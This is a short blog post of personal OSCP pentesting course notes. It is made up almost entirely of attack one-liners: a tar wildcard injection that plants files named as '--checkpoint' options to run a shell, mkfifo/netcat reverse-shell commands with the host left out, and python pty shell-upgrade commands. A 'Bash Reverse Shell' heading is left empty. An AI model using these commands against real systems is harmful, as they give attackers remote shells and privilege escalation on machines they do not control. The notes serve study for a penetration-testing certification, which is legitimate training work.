• Post author:
  • Post category:OSCP

The following is notes from my pentesting course for OSCP

If there is a app using tar * you can do the following

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f”
touch “/var/www/html/–checkpoint-action=exec=sh”
touch “/var/www/html/–checkpoint=1”

Clean Shell using Phone on Linux

python -c ‘import pty; pty.spawn(“/bin/bash”)’

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

# Simple shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f

# Bash Reverse Shell


More of a read